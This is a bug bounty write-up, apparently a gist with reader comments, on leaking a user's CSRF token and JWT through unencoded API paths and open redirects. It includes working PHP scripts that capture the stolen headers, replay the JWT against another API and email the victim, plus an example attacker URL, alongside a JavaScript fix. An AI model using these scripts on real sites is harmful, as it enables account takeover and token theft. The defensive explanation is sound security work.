You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one case a JWT was leaked, in the other the CSRF token. The root cause was the same in both: client-side JavaScript did not validate or URI-encode user-controlled input before building an API request, so an attacker could steer that request into an open redirect and have the browser deliver it, sensitive headers included, to my server.

CSRF token bug

  1. There is an open redirect on
  2. User loads
  3. JavaScript code in makes a GET request to with the header x-csrf-token set to the CSRF token of the user's session:
    GET /verify/VALUE HTTP/1.1
    x-csrf-token: the-csrf-token-of-the-user
  4. The issue is that if the user loads, the application makes the GET request of step 3 to, the browser follows the redirect (custom request headers such as x-csrf-token are kept when a redirect crosses origins), and the x-csrf-token ends up being sent in a GET request to
  5. attack.php stores the value of x-csrf-token, or does whatever else is necessary for the attack:
      <?php
      // These headers are specific to this request.
      // Open your web browser Console whenever you are testing a similar issue
      // to check if there is any CORS issue that you have to fix in your response.
      header('Access-Control-Allow-Origin: *');
      header('Access-Control-Allow-Headers: x-requested-with,x-csrf-token');
      foreach (getallheaders() as $key => $value) {
        // Header names are case-insensitive, so compare accordingly.
        if (strcasecmp($key, 'x-csrf-token') === 0) {
          $token_file = fopen('csrf_token.txt', 'w');
          fwrite($token_file, $value);
          fclose($token_file);
        }
      }
    For my proof of concept, I took the value of x-csrf-token and made changes to the profile of the user/victim on

JWT bug

  1. There is an open redirect on. This open redirect was different because first I had to make a request to another endpoint with the URL I wanted to redirect to, and a "reference" value was returned in the response. Once I had that reference value, any request to by any user redirected to the URL I had sent in the first request.
  2. User loads
  3. JavaScript code makes a GET request to with the Authorization header set to Bearer JWT-of-the-authenticated-user:
    GET /check/VALUE/please HTTP/1.1
    Authorization: Bearer JWT-of-the-authenticated-user
  4. The issue is that the attacker can create a redirect to, and when the user loads (%26 decodes to &, which was necessary to push the trailing "/please" out of the "reference" value and into a separate parameter), the application makes a GET request to, which redirects to with the JWT still in the Authorization header. Caveat: the Fetch Standard now requires browsers to drop the Authorization header when a redirect changes origin, so this JWT variant no longer reproduces in browsers that implement that rule; custom headers like x-csrf-token are not stripped, so the first variant is unaffected.
  5. attack.php stores the JWT, or does anything that is possible with it:
      <?php
      header('Access-Control-Allow-Origin: *');
      header('Access-Control-Allow-Headers: authorization');
      foreach (getallheaders() as $key => $value) {
        if (strcasecmp($key, 'Authorization') === 0) {
          // Replay the victim's JWT against another API that accepts it
          // (the URL is elided in the original).
          $opts = array(
            'http' => array(
              'header' => 'Authorization: ' . $value
            )
          );
          $context = stream_context_create($opts);
          $file = file_get_contents('', false, $context);
          $fh = fopen('out.txt', 'w');
          fwrite($fh, $file);
          fclose($fh);
          $json = json_decode($file, true);
          $sent = mail($json['email'], 'Hi ' . $json['name'], 'Your user id is ' . $json['id'], 'From:');
          if ($sent) {
            echo 'Email sent';
          } else {
            echo 'Couldn\'t send email';
          }
        }
      }
    For my proof of concept, I took the JWT, got information about the user/victim from another API which accepted the same JWT in the Authorization header, and sent an email to the user/victim. The previous code is exactly what I used as proof of concept.
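Both bugs above share one client-side root cause: a value taken from the page URL is string-concatenated into an API path, so `../` walks out of the intended endpoint and `?` (or a percent-encoded `&`) lets the attacker supply the redirect's query string. The JavaScript below is an added example, not code from the gist or from the affected programs. It reproduces the path construction for both cases and shows the fix, and it generalizes slightly beyond the text: one hardened builder covers both endpoints, and the fetch wrapper refuses to follow redirects at all. The endpoints `/verify/<value>`, `/check/<value>/please`, the open redirect `/redirect?url=...` and `?reference=...`, the query parameter `value`, and the hosts `app.example` and `attacker.example` are all hypothetical placeholders for the URLs elided in the writeup.

```javascript
// Added example, not the gist's code. All endpoints and hosts are hypothetical:
//   GET /verify/<value>         (sends x-csrf-token)
//   GET /check/<value>/please   (sends Authorization: Bearer <jwt>)
//   GET /redirect?url=... or ?reference=...   (the open redirect)
const APP_ORIGIN = 'https://app.example';

// How the vulnerable pages obtained VALUE: from their own query string.
// URLSearchParams percent-decodes once, so %2F becomes "/" and %26 becomes "&",
// which is why the attacker URL-encodes those characters in the outer URL.
function valueFromPageUrl(pageHref) {
  return new URL(pageHref).searchParams.get('value');
}

// Vulnerable construction (CSRF case): VALUE is concatenated into the path raw,
// so "../" escapes /verify/ and "?" starts a query string of the attacker's choice.
function buildVerifyUrlVulnerable(value) {
  return new URL('/verify/' + value, APP_ORIGIN);
}

// Vulnerable construction (JWT case): the trailing "/please" is what the
// decoded "&" pushes into a separate, ignored parameter.
function buildCheckUrlVulnerable(value) {
  return new URL('/check/' + value + '/please', APP_ORIGIN);
}

// Hardened construction for either endpoint: encode VALUE as a single path
// segment, then refuse any result that does not still point at the intended
// endpoint on our own origin with no query string.
function buildApiUrlSafe(prefix, value, suffix = '') {
  const url = new URL(prefix + encodeURIComponent(value) + suffix, APP_ORIGIN);
  if (url.origin !== APP_ORIGIN || !url.pathname.startsWith(prefix) ||
      !url.pathname.endsWith(suffix) || url.search !== '') {
    throw new Error('refusing unexpected API URL: ' + url.href);
  }
  return url;
}

// Defence in depth for the request itself: an authenticated API call should
// never follow a redirect. redirect: 'error' makes fetch() fail on any 3xx
// instead of carrying the headers to wherever the Location header points.
function fetchApi(url, headers) {
  return fetch(url, { headers, redirect: 'error', credentials: 'same-origin' });
}
```

Run the builders against a page URL such as `https://app.example/page?value=..%2Fredirect%3Furl%3Dhttps%3A%2F%2Fattacker.example%2Fattack.php` and compare `.pathname` and `.searchParams`: the vulnerable builder resolves to `/redirect` with the attacker's `url` parameter, while the hardened one keeps the whole value inside a single `/verify/` segment. The same-origin check matters even with encoding, because a value of just `..` still normalizes to `/` and must be rejected rather than sent.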


It has been a long time since I shared something that could be useful for new bug bounty hunters; I hope this is useful.


After three years, I say thank you for this. Always share; sooner or later it will help somebody. Cheers.


@Th3redTea you're welcome! I'm still finding bugs like this one, so it's worth the time looking for them.
I haven't written anything in a long time because most bugs I found are well documented. If I find something interesting that is not well documented, I will write about it.
Thank you for taking the time to comment with a "thank you".
